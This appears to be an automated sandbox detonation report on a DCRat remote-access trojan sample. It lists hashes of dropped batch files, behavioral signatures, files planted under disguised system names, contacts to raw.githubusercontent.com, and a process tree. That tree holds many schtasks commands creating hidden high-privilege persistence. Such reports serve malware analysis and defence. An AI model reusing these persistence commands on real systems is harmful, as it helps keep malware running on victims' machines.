memory/888-182-0x0000000000260000-0x0000000000370000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ac29dc62974a46408792a93072a9aabb |
| SHA1 | a754a4813af95c1b516eaf9dbed52602d226fc0b |
| SHA256 | 6d177c3ba044182f4042b70096501b8b29df2bc1658f37483dbbdc0f09825f72 |
| SHA512 | ff1edb2cab366c77c1d85613b1cbfe74567efbb77c6dad9ab0a4892082b2702d7ba38db4220d57ce3a625ed804eb7ae42902ef89275872b758a33c03bc59ad33 |
C:\Users\Admin\AppData\Local\Temp\jkzlbVqk90.bat
| MD5 | 3694d19fae04894cc44849d5dd5298a6 |
| SHA1 | 85f647105984bf9cac0b279052b00e5ba380a7fb |
| SHA256 | 12533a9ee649e8cf3e5b84ad79eab0addcebe53dc0fe85a38e53d2ca54e33771 |
| SHA512 | 88501706dabd2646df9219c90f9730046f5e16540ba999acdcb81eed373440911056f3fcfcaa7d85bd2770061ff5f4ade94ba56371f98aa6c9c465d870c926d7 |
memory/2820-242-0x0000000000920000-0x0000000000A30000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 639054c03c7669c50e4a0d867b225282 |
| SHA1 | 270a5a0c7b8904516db7b84afc023318f0c37c80 |
| SHA256 | 9e8d1e168631b37a78a7f6c423e10cfbe9532655f8503d4d6b99ee5842e2073f |
| SHA512 | 1a26b5469200c8090f18809e0668e104dbfe9d21f0f7d0e803f708ff8f356533ed863c92f0d06add63373b900e8a2479005f08a3d88d07d55a1775ef99e708f7 |
C:\Users\Admin\AppData\Local\Temp\z7AIE64VZ5.bat
| MD5 | affd190a4bb81353cdb1c5806cc384d0 |
| SHA1 | cc6dea4abb949196b18778e08abae6aee970639c |
| SHA256 | 6a29dcbac2b4cb31acbaa9ba369667c0f5e1ad4afbbbf5db2662789acd96e70f |
| SHA512 | cdae6ddcd8e5d9e7bb3b0df19f788c98301e1abe8f82ceefd86a55712042bf10dab9deb4eea44512ae41b7f534ce460da81ad384220a69bb2bd78d055e05e789 |
memory/2740-302-0x00000000012F0000-0x0000000001400000-memory.dmp
memory/2740-303-0x00000000003D0000-0x00000000003E2000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 47654a8493fefb428f52abda6d74afa0 |
| SHA1 | 74b971640afa857207ab0a0d2634188811d0c0a9 |
| SHA256 | 563dea0cafcb0b533047f872ea3e6c7650d2a754831f6346aa1d9282e3d26b61 |
| SHA512 | b0b6f90dced5382b02be5fa7dbc0acd674ede43d4e23c87d663ba52a2800b3306edb7895cf6f9d73d373cb1dc89e878be681771e7249ece66fcffa25764187cc |
C:\Users\Admin\AppData\Local\Temp\76lQa6YaxV.bat
| MD5 | 28ce71b4715cd8f1be0a6942690d06f9 |
| SHA1 | 2513b8925d78e53ebafa8b9c305f8a996d1cd4cc |
| SHA256 | 4b8d3a2e063a44935a5f8ecdec8d2de22cea8c5458ecf8c155916b4bba2ab7b2 |
| SHA512 | 354fddb5c290b4c6dc39b79d53ee52abe915672993cac00f2aa0fdb22fd298d9b368756d6d0e8151c688d3704082fe3339b9a6666bb2f81d2e299dbe4fc86eb3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8a71ebcae2f4958c7b1316379d647899 |
| SHA1 | b14bcebd07556b89c22d1848572fce72307a3f37 |
| SHA256 | 97b2e636738b891e875c75fa94b44f7be5b1504acf216a9187127cc45bd73586 |
| SHA512 | 6ef034aa3df95a98c0b25662d6ae2f3cc11438164bdcf36fc44f4b91066b79bbee15390235363e8f36592cb189b662c4a69b8e37f38429b1f71aba4599d92567 |
C:\Users\Admin\AppData\Local\Temp\QqrgVo7Q94.bat
| MD5 | 1c9ce1144777c4b5c4e2a3b6f1f67e70 |
| SHA1 | 81430a656b4b542989705fdcc44da3d9670a9fd4 |
| SHA256 | f15e295c8d06b8bad7575df8342e66b10d003600078bf35f01161ade93daa972 |
| SHA512 | a90b1f437480c15434009ebd149f2100b34749bc589188b8d69d6efa8d810fa79cc763c88b946ecb99b574f6b48eb26bb127f0e97abc62ddf506f9b0710283fb |
memory/2060-422-0x0000000000250000-0x0000000000262000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | cc75d7f89ec50b1b30710b9df99b93ce |
| SHA1 | 5e7a310a415e5a731b2ae39203bfcea5b9a7f806 |
| SHA256 | d2dbd376f477913cdb3b768270bc2b5f803de6e0ef8382d6324e76550dd647a9 |
| SHA512 | ab8cecbd8e48de0c5e49561fadd242e0c5094fc8fa46ba76b08e3a3ac4fc96da8814ec8c40b89bb65576ae5d94f1d1cef69fe3c565df6d75d43dd22ceb2a4ef0 |
C:\Users\Admin\AppData\Local\Temp\F82V1kRox2.bat
| MD5 | 617a257eeffb794f24bcc0289bb18721 |
| SHA1 | e6ab3580e863e2ad680f6018efe189d2d4dd1d66 |
| SHA256 | 73476f563577581655fae373fedcc260428f3820bf0e439053cecde2f3fc2968 |
| SHA512 | c1332aa48c7056ea34ee8f70dda9aedb42cdb34cd7ae4f9ef839dcd92839b96aca93718183434267a9f2f5285d0496ddee1764a21bbdd8d1585c3a681ee258f0 |
memory/2448-482-0x0000000000680000-0x0000000000692000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4cada96f2f2530384cd9d9ea099389b5 |
| SHA1 | 845d7517b7676243cd0f46e0a58f4c7174a67f6a |
| SHA256 | 8dfb21fafe863caba77e1bbbb25de2cf6038bac7496009ff80fe726b21990847 |
| SHA512 | b96815fe84987bf3e9a56d51470b0e891bb35819b725633858fd57ab562004eff2b0f2a31e000cc014d3154e685cc9e53b8c766a637f706047404859764392a9 |
C:\Users\Admin\AppData\Local\Temp\LabqbH8bfv.bat
| MD5 | 10fce3327ccc45097f0d82e4b7d6ac39 |
| SHA1 | d538508dd88535e176d4156f947c692969c28c81 |
| SHA256 | ab8054c73503e2fcf2f5d8477da117886a2556b98a3dbf8f024f9997fadca8d7 |
| SHA512 | 1d27d6b083dce8e1b13505fbaceabe62f52f4c26d1dd4a90a475e8d685bdab7f56a747490a0a9eb28cde22f9aa81c5bc0b0dd005817d56b65ed881589f6e1623 |
memory/2188-542-0x0000000000250000-0x0000000000262000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | dc8b714c3cdb7ebb8821466d510a4f83 |
| SHA1 | e15ede3bb0fa1c9ff275accd641fd378a376bb8c |
| SHA256 | 9f4265e2678258e9f527d1a20dfd06705c2f494df00f329278c9ee6d122cea4c |
| SHA512 | 2caa00d23048b564236ff2ee65dbaa3a374d71ae9e804f6c9dd43b2d3104d2b7a13f4f49665a57fea36ed60f9d893ae1bdd1e4ba0e5bf561365b0a5b0248d31c |
C:\Users\Admin\AppData\Local\Temp\2wrSnsL5gc.bat
| MD5 | c29658f77cf4c9a90c8386f44e134043 |
| SHA1 | 31448b35337beec91241fb2dffa450ff24ae98c0 |
| SHA256 | cafcc0762edcb04f3050e857c1d4f07ae150a68fdc7e864bb3f50786a2b805de |
| SHA512 | c76bd80d4db1be4f654ea48f588b91ed008ae4c1c7cc98a82208d236639c6926c7a6c00b1fe4a1eb7dba9a3431b8fa1e07b0ea6213b56f7bb9ba51da42f6b567 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 46f5eea86880bfc6bc71852be1b7a0fe |
| SHA1 | 4b824d2886f5c0734d683b16967e7101c85686f8 |
| SHA256 | 578a0cea70e6524dab39695546f872d818a45371819726413b3d68d807d1e913 |
| SHA512 | 689a943b8d188184366f4c0378ea13824b8989c5ee545eaf861e325ba3033136dab407c670b6826f1a72a8e72d4ecabd172d78d4c46cbacf11efcaa78e81d871 |
C:\Users\Admin\AppData\Local\Temp\WtQmBjXbDh.bat
| MD5 | 98af29fab26806fbbe82f375a164ef86 |
| SHA1 | 5eaa9bb1a72768ecee367a71189344cec2b7be97 |
| SHA256 | 197598a944d1ed1cc1926ec2c0226abc70853d8e7e5fe0a096fee387bab289fb |
| SHA512 | 76b4742bcf3817a373465514192cd7e109d0616c3841aa48af484b56c8accd1c300823330f71a929e6e1a2b914e6ad6e7910b2a703414dad29bdca93c1ef1ee0 |
memory/3000-661-0x0000000000450000-0x0000000000462000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 61ea5ee42951de8340d5c5859bf72e35 |
| SHA1 | 6e19f9256bb476d8ebc3af479060bc4f2c198921 |
| SHA256 | c76feb2330c1f12274e516e1954727e200404ee67e8e3d9b75e6fe8e5cd6b2a1 |
| SHA512 | 57ee5c4dc1955a172ff4f36e0af241d96e295e00e902245b5de06f31708d1a40c0e5467cc75e064c74ec262c931fe5ca54901b1e4d155a5217296fd42eea9ed5 |
C:\Users\Admin\AppData\Local\Temp\D6YKtyItKL.bat
| MD5 | d524cc415175928398a6e342ea6bf986 |
| SHA1 | 48875f684c655bbd45d885f482cdcde1b412d2c3 |
| SHA256 | cecd87a77dabd38216695b67ebae4ec3bc3d4f77cf2ac3ecdfefc169de71a15e |
| SHA512 | edfeac2b4cdae37847ad326d364e9a0039c94778371537d6f2f7a2af854b52819e133a9bac9a46739cb9c64173dca6bf2012562fb1fc9b3b14a496287bc514b0 |
memory/2084-721-0x00000000000F0000-0x0000000000200000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c74ea9a31c44d1ed2fbef985724b1564 |
| SHA1 | 36d3e584f7b33a1f7fcbf38590d85e00db06d099 |
| SHA256 | 84fab8c8d2d1f33b2e0b137010a1756c4adf51ad512f3c65201cb549f1b6970f |
| SHA512 | 4d4fc13e2785e1209f3928c8479ba9362b8cd198df1b0384eda0d3a6be05079828c9208d9e092358c5f669f10314c1448e92d91f1909ceb6f16b058e73e3d648 |
C:\Users\Admin\AppData\Local\Temp\eTpA0L9dlX.bat
| MD5 | b548a44a1bf5c7b5916b4d069da0184f |
| SHA1 | 4065267d7046352497ed4ac87a00a1cfd8769197 |
| SHA256 | 78eacfb90de18b4ad0cadff72243e981b2f9aea2752b799e4cff3d0149e11f8c |
| SHA512 | f7f0f078940e695aaa071aef0f59e3a59bcbaaa01afdb3c2d54581c04f41d6b340d6de9bba61483c55835578a70c305f276aeed9b193d0bf48bd7431123eff3b |
memory/1992-781-0x0000000000360000-0x0000000000470000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-30 02:14
Reported
2024-12-30 02:16
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\providercommon\DllCommonsvc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\providercommon\DllCommonsvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Multimedia Platform\29c1c3cc0f7685 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Mozilla Maintenance Service\services.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Mozilla Maintenance Service\c5b4cb5e9653cc | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\ebf1f9fa8afd6d | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows Portable Devices\spoolsv.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows Portable Devices\sppsvc.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows Portable Devices\0a1fd5f707cd16 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\cmd.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows Portable Devices\f3b6ecef712a24 | C:\providercommon\DllCommonsvc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\GameBarPresenceWriter\Idle.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\GameBarPresenceWriter\6ccacd8608530f | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\Sun\fontdrvhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\Sun\5b884080fd4f94 | C:\providercommon\DllCommonsvc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\providercommon\DllCommonsvc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
C:\providercommon\DllCommonsvc.exe
"C:\providercommon\DllCommonsvc.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Templates\unsecapp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Admin\Templates\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Templates\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Documents\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\Documents\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
